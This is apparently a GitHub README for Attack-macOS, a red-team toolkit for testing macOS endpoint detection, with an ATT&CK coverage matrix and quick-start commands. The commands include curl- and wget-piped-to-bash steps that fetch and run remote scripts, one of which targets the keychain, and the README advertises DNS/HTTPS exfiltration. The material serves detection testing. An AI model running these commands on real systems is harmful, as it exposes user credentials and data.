Key Features • Quick Start • Integrations

Attack-macOS provides scripts for security teams to evaluate macOS endpoint detection and response capabilities. This project executes Living Off The Orchard (LOLBins) techniques via standalone scripts with built-in encoding, encryption, formatting, logging, and exfiltration over DNS and HTTPS.

Challenges

flowchart TD
    A1("🚫 Limited OSS testing tools")
    A2("⚡ Existing tools are tier II/III (advanced C2s)")
    A3("🛡️ Commercial tools focus on hardening and MDM")

    style A1 stroke:#ff6b35,stroke-width:2px,fill:transparent
    style A2 stroke:#ff6b35,stroke-width:2px,fill:transparent
    style A3 stroke:#ff6b35,stroke-width:2px,fill:transparent

Loading

flowchart TD
    A4("📊 Limited technique and procedure coverage")
    A5("❓ Known risks are not common knowledge")
    A6("🔧 Hard to operationalize test pipelines")
  
    style A4 stroke:#ff6b35,stroke-width:2px,fill:transparent
    style A5 stroke:#ff6b35,stroke-width:2px,fill:transparent
    style A6 stroke:#ff6b35,stroke-width:2px,fill:transparent

Loading

Solution

flowchart TD
    A1("✓ Build a library of attack scripts that help security teams evaluate and improve macOS endpoint detection and response capabilities.")
    style A1 stroke:#90EE90,stroke-width:2px,fill:transparent

Loading

Key Features

Feature	Description	Benefit
Builder Tool	YAML template, schema, and builder tool for new scripts with built-in argument parsing/validation. Parse Args	Reduces script development time and errors via automated validation.
Modular Design	Self-contained scripts for independent use or easy integration with security test frameworks.	Allows quick deployment without complex toolchains.
Standardized Help	All scripts include --help menus for standalone or handler-based execution.	Speeds up execution by reducing documentation lookup.
macOS Native	TTPs primarily use native macOS command-line binaries and APIs (LOObins) via shell scripts. Some TTPs use osascript (for JXA/AppleScript), python3, or swift for specific tasks or wrappers. The attackmacos.sh handler has minimal dependencies.	Produces realistic macOS telemetry by leveraging system utilities and scripting languages.
MITRE ATT&CK Mapped	Scripts and arguments map directly to the MITRE ATT&CK framework.	Aids compliance reporting and threat model alignment.
Logging	Syslog logging with JSON/CSV output formatting. Log Output	Automates evidence collection; speeds up post-test analysis.
Encoding and Encryption	Offers multiple data encoding (Base64, Hex, Perl) and encryption (AES, GPG, XOR) options. Encode Output • Encrypt Output	Simulates evasion techniques for improved test realism.
Exfiltration	Simulates data exfiltration via HTTP/S and DNS. Exfiltrate Data	Tests attack chains to find data loss prevention gaps.
CI/CD Pipeline Ready	Integrates with security tools, automation pipelines, and CI/CD workflows.	Supports continuous security testing with less manual effort.
Caldera Integration	Native Caldera plugin for integration with red team operations. Caldera Plugin	Streamlines Caldera deployment and execution for red teams.
YAML-First Configuration	Each technique defined in YAML with complete metadata, arguments, and MITRE ATT&CK mapping	Automated ability generation and consistent deployments
Modular Design	Self-contained scripts that work independently or combined, integrate with existing security test frameworks	Quick deployment without complex tool chains or infrastructure changes
Standardized Help	All scripts include --help menus for standalone execution via custom deployment frameworks	Execute without documentation lookup
macOS Native	Uses native tools and interpreters without external dependencies. See LOLBins	Produces macOS telemetry attributed to threat actors
MITRE ATT&CK Mapped	All scripts and arguments mapped to MITRE ATT&CK framework with proper technique IDs and names	Compliance reporting and threat model alignment
Multiple Output Formats	JSON, CSV output formatting for analysis and integration	Evidence collection and post-test analysis
Encoding and Encryption	Multiple data encoding options and encryption functions including AES-256-CBC, GPG, and XOR	Test realism using evasion techniques
Exfiltration	Data exfiltration via HTTP/S or DNS protocols	Test complete attack chains and identify detection gaps in data loss prevention
CI/CD Pipeline Ready	Integrates with existing security tools, automation pipelines, and CI/CD workflows	Continuous security testing without manual intervention

Execution Workflow

flowchart TD
    A( 1: Choose your procedure script) --> A1("🐚 Shell Scripts")
    A --> A2("🟡 JXA Scripts")
    A --> A3("🐍 Python Scripts")
    A --> A4("🦉 Swift Scripts")
    
    A1 --> B( 2: Choose Delivery Method)
    A2 --> B
    A3 --> B
    A4 --> B
    
    B --> B1("🏠 Local ")
    B --> B2("☁️ Remote from GGH</br>curl</br>wget</>osascript ")
    
    B1 --> C(3: Execute</br>T1634: Dump Keys)
    B2 --> C
    
    C --> C1("📋 Format")
    C --> C2("🔧 Encode")
    C --> C3("🔐 Encrypt")
    C --> C4("📡 Exfiltrate")
    
    C1 --> D("📋 Log and<br>🔍Analyze Events")
    C2 --> D
    C3 --> D
    C4 --> D
    
    D --> D1("🎯 Identify Endpoint</br>Detection Gaps")
    
    style A1 fill:transparent,stroke:#6140E0,stroke-width:2px
    style A2 fill:transparent,stroke:#C7B300,stroke-width:2px
    style A3 fill:transparent,stroke:#3BC05A, stroke-width:2px
    style A4 fill:transparent,stroke:#47B7F8, stroke-width:2px
    style A fill:#0D0D0D,stroke:#7A6AB7,stroke-width:2px,color:#fff
    style B fill:#0D0D0D,stroke:#7A6AB7,stroke-width:2px,color:#fff
    style C fill:#0D0D0D,stroke:#EB5454,stroke-width:2px,color:#fff
    style D fill:#0D0D0D,stroke:#7A6AB7,stroke-width:2px,color:#fff
    style D1 fill:#1a237e,stroke:#47B7F8,stroke-width:2px,color:#fff

Loading

MacOS ATT&CK Coverage Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command And Control	Exfiltration	Impact
External Remote Services	Shared Modules	Socket Filters	Boot or Logon Initialization Scripts	Socket Filters	Adversary-in-the-Middle	System Owner/User Discovery	VNC	Archive via Utility	Socket Filters	Exfiltration Over Web Service	Disk Structure Wipe
Compromise Software Dependencies and Development Tools	JavaScript	Boot or Logon Initialization Scripts	Path Interception by PATH Environment Variable	Embedded Payloads	Pluggable Authentication Modules	Internet Connection Discovery	Taint Shared Content	Screen Capture	Standard Encoding	Exfiltration Over Webhook	Direct Network Flood
Spearphishing Link	Malicious File	Pluggable Authentication Modules	Create or Modify System Process	Pluggable Authentication Modules	Keylogging	Permission Groups Discovery	SSH	Adversary-in-the-Middle	Domain Generation Algorithms	Scheduled Transfer	External Defacement
Spearphishing Attachment	Cron	Path Interception by PATH Environment Variable	LC_LOAD_DYLIB Addition	File/Path Exclusions	Password Guessing	Device Driver Discovery	SSH Hijacking	Keylogging	DNS	Exfiltration Over Other Network Medium	OS Exhaustion Flood
Compromise Hardware Supply Chain	Scheduled Task/Job	Create or Modify System Process	Sudo and Sudo Caching	Linux and Mac File and Directory Permissions Modification	OS Credential Dumping	Domain Account	Remote Services	Audio Capture	Symmetric Cryptography	Exfiltration Over Bluetooth	Application Exhaustion Flood
Supply Chain Compromise	AppleScript	External Remote Services	Boot or Logon Autostart Execution	Path Interception by PATH Environment Variable	Steal Web Session Cookie	Local Account	Remote Service Session Hijacking	Archive via Custom Method	Fast Flux DNS	Automated Exfiltration	Disk Wipe
Exploit Public-Facing Application	Native API	LC_LOAD_DYLIB Addition	Cron	Email Hiding Rules	Securityd Memory	System Checks	Software Deployment Tools	Email Collection	Application Layer Protocol	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Stored Data Manipulation
Content Injection	Command and Scripting Interpreter	Boot or Logon Autostart Execution	Scheduled Task/Job	Encrypted/Encoded File	Password Cracking	Domain Groups	Exploitation of Remote Services	Data from Removable Media	Remote Access Software	Exfiltration to Code Repository	Service Stop
Default Accounts	Launchctl	Cron	Login Hook	Rootkit	Keychain	System Service Discovery	Internal Spearphishing	Local Data Staging	Content Injection	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Application or System Exploitation
Trusted Relationship	XPC Services	Scheduled Task/Job	Process Injection	Sudo and Sudo Caching	Password Managers	Network Sniffing	Lateral Tool Transfer	Automated Collection	Traffic Signaling	Exfiltration Over C2 Channel	Runtime Data Manipulation
Phishing	User Execution	Browser Extensions	Launch Daemon	Match Legitimate Name or Location	Network Sniffing	Network Share Discovery		Clipboard Data	Protocol Tunneling	Exfiltration Over Alternative Protocol	Reflection Amplification
Valid Accounts	Software Deployment Tools	Login Hook	Default Accounts	Masquerade File Type	Steal or Forge Kerberos Tickets	Peripheral Device Discovery		Remote Data Staging	Mail Protocols	Exfiltration over USB	Service Exhaustion Flood
Spearphishing Voice	Unix Shell	Traffic Signaling	Trap	Hide Artifacts	Credentials from Password Stores	System Information Discovery		Data from Local System	Communication Through Removable Media	Exfiltration to Text Storage Sites	Defacement
Compromise Software Supply Chain	Inter-Process Communication	Launch Daemon	Dynamic Linker Hijacking	System Checks	Unsecured Credentials	Wi-Fi Discovery		Archive via Library	External Proxy	Exfiltration to Cloud Storage	Financial Theft
Domain Accounts	Exploitation for Client Execution	Web Shell	Abuse Elevation Control Mechanism	Clear Linux or Mac System Logs	Credentials from Web Browsers	Application Window Discovery		Archive Collected Data	Proxy	Data Transfer Size Limits	Internal Defacement
Hardware Additions	Python	Default Accounts	Setuid and Setgid	Stripped Payloads	DHCP Spoofing	Time Based Evasion		DHCP Spoofing	Dynamic Resolution	Exfiltration Over Physical Medium	Data Manipulation
Drive-by Compromise	System Services	Trap	SSH Authorized Keys	Gatekeeper Bypass	Private Keys	Browser Information Discovery		Web Portal Capture	Web Service	Exfiltration Over Unencrypted Non-C2 Protocol	Account Access Removal
Spearphishing via Service	Visual Basic	Dynamic Linker Hijacking	Login Items	Code Signing	Password Spraying	System Network Configuration Discovery		Video Capture	DNS Calculation		Data Encrypted for Impact
Local Accounts	Malicious Link	Local Account	Emond	Break Process Trees	Web Portal Capture	Account Discovery		Email Forwarding Rule	Multi-Stage Channels		Endpoint Denial of Service
	At	SSH Authorized Keys	Account Manipulation	Clear Network Connection History and Configurations	Steal or Forge Authentication Certificates	File and Directory Discovery		Data Staged	Port Knocking		Resource Hijacking
		Domain Account	Kernel Modules and Extensions	Clear Command History	Bash History	System Network Connections Discovery		GUI Input Capture	File Transfer Protocols		Transmitted Data Manipulation
		Component Firmware	Hijack Execution Flow	Deobfuscate/Decode Files or Information	Credentials In Files	Virtualization/Sandbox Evasion		Data from Network Shared Drive	One-Way Communication		Data Destruction
		Pre-OS Boot	Valid Accounts	Impair Defenses	Web Cookies	Log Enumeration		Input Capture	Multi-hop Proxy		Network Denial of Service
		Login Items	Exploitation for Privilege Escalation	Masquerading	Forge Web Credentials	Process Discovery		ARP Cache Poisoning	Data Obfuscation		Firmware Corruption
		Port Knocking	Event Triggered Execution	Clear Mailbox Data	Multi-Factor Authentication Request Generation	User Activity Based Checks		Data from Information Repositories	Non-Standard Port		Inhibit System Recovery
		Compromise Host Software Binary	Unix Shell Configuration Modification	Process Injection	Exploitation for Credential Access	Local Groups			Encrypted Channel		Disk Content Wipe
		Emond	Elevated Execution with Prompt	Traffic Signaling	GUI Input Capture	Password Policy Discovery			Bidirectional Communication		System Shutdown/Reboot
		Account Manipulation	Startup Items	System Binary Proxy Execution	Brute Force	System Language Discovery			Asymmetric Cryptography
		Kernel Modules and Extensions	Domain Accounts	Timestomp	Credential Stuffing	System Location Discovery			Non-Application Layer Protocol
		Hijack Execution Flow	Launch Agent	Reflective Code Loading	Multi-Factor Authentication	Security Software Discovery			Protocol Impersonation
		Valid Accounts	Installer Packages	Ignore Process Interrupts	Input Capture	Remote System Discovery			Domain Fronting
		Multi-Factor Authentication	RC Scripts	Time Based Evasion	ARP Cache Poisoning	Network Service Discovery			Data Encoding
		Event Triggered Execution	Re-opened Applications	Disable or Modify System Firewall	Multi-Factor Authentication Interception	Software Discovery			Non-Standard Encoding
		Unix Shell Configuration Modification	TCC Manipulation	Electron Applications	Modify Authentication Process	Debugger Evasion			Web Protocols
		Startup Items	At	Code Signing Policy Modification		System Time Discovery			Ingress Tool Transfer
		Domain Accounts	Dylib Hijacking	Binary Padding					Hide Infrastructure
		Launch Agent	Local Accounts	Default Accounts					Steganography
		Server Software Component		Dynamic Linker Hijacking					Fallback Channels
		Installer Packages		File and Directory Permissions Modification					Internal Proxy
		RC Scripts		Abuse Elevation Control Mechanism					Dead Drop Resolver
		Create Account		Setuid and Setgid					Junk Data
		Re-opened Applications		Indicator Blocking
		Power Settings		Right-to-Left Override
		At		Component Firmware
		Modify Authentication Process		Indicator Removal
		Dylib Hijacking		Masquerade Task or Service
		Local Accounts		Plist File Modification
				Pre-OS Boot
				Downgrade Attack
				Virtualization/Sandbox Evasion
				Execution Guardrails
				Port Knocking
				Hidden Users
				Impair Command History Logging
				User Activity Based Checks
				Disable or Modify Tools
				Hijack Execution Flow
				Indicator Removal from Tools
				Valid Accounts
				Resource Forking
				Obfuscated Files or Information
				Multi-Factor Authentication
				Invalid Code Signature
				Run Virtual Instance
				Subvert Trust Controls
				Elevated Execution with Prompt
				Rename System Utilities
				Spoof Security Alerting
				Steganography
				Domain Accounts
				Install Root Certificate
				Compile After Delivery
				VBA Stomping
				Impersonation
				Hidden Window
				Clear Persistence
				HTML Smuggling
				Command Obfuscation
				File Deletion
				Software Packing
				Hidden File System
				Debugger Evasion
				Space after Filename
				TCC Manipulation
				Hidden Files and Directories
				Environmental Keying
				Modify Authentication Process
				Dylib Hijacking
				Local Accounts
				Exploitation for Defense Evasion

Quick Start

Using attackmacos.sh Handler

# 1. Clone the repository
git clone https://github.com/darmado/attack-macOS.git
cd attack-macOS

# 2. Local execution using the handler
./attackmacos/attackmacos.sh --method local --tactic discovery --ttp browser_history --args='-s'

# 3. Remote execution using the handler
./attackmacos/attackmacos.sh --method curl --tactic credential_access --ttp keychain --args='--verbose --encode base64'

# 4. List available TTPs for a tactic
./attackmacos/attackmacos.sh --list-local --tactic discovery
./attackmacos/attackmacos.sh --list-remote --tactic credential_access

# 5. Show banner and help
./attackmacos/attackmacos.sh --banner --help

Handler Dependencies

The ./attackmacos/attackmacos.sh handler script requires:

• A POSIX-compliant shell (e.g., bash, zsh, sh).
• curl or wget for remote script execution (when using --method curl or --method wget respectively).
• osascript if using the --method osascript (this is a standard component of macOS).

Caldera Integration

# 1. Build and sync Caldera plugin
python cicd/build_shell_procedure.py --sync-caldera

# 2. Copy plugin to Caldera
cp -r integrations/caldera/plugins/attackmacos /path/to/caldera/plugins/

# 3. Restart Caldera server
# Caldera operations will then include the plugin abilities.

# 4. Use with facts in Caldera
# Set fact: user.arg = "--safari --chrome --search malware"
# Execute ability: browser_history

Caldera Documentation: Caldera Plugin Guide

Local Execution (Direct)

# 1. Clone the repository
git clone https://github.com/darmado/attack-macOS.git
cd attack-macOS

# 2. Run a technique directly
./ttp/discovery/shell/system_info.sh

# 3. Run with custom parameters
./ttp/credential_access/shell/keychain.sh --verbose --log-output --encode base64

# 4. Use the builder to create custom scripts
cd tools
python3 build_shell_procedure.py --input ../attackmacos/ttp/discovery/shell/system_info.yml --output ../custom_scripts/

Remote Execution (Direct)

# 1. Execute directly from GitHub without cloning
curl -s https://raw.githubusercontent.com/darmado/attack-macOS/main/ttp/discovery/shell/system_info.sh | bash

# 2. Download and execute with parameters
curl -s https://raw.githubusercontent.com/darmado/attack-macOS/main/ttp/credential_access/shell/keychain.sh | bash -s -- --verbose --log-output --encode base64

# 3. Execute specific technique with wget
wget -qO- https://raw.githubusercontent.com/darmado/attack-macOS/main/ttp/discovery/shell/browser_history.sh | bash

Integrations

Caldera Plugin

Repository: https://github.com/darmado/caldera-plugin-attack-macos

Native Caldera plugin for seamless integration with red team operations. The plugin transforms attack-macOS YAML configurations into ready-to-execute abilities using a full command approach.

License

Apache License 2.0. LICENSE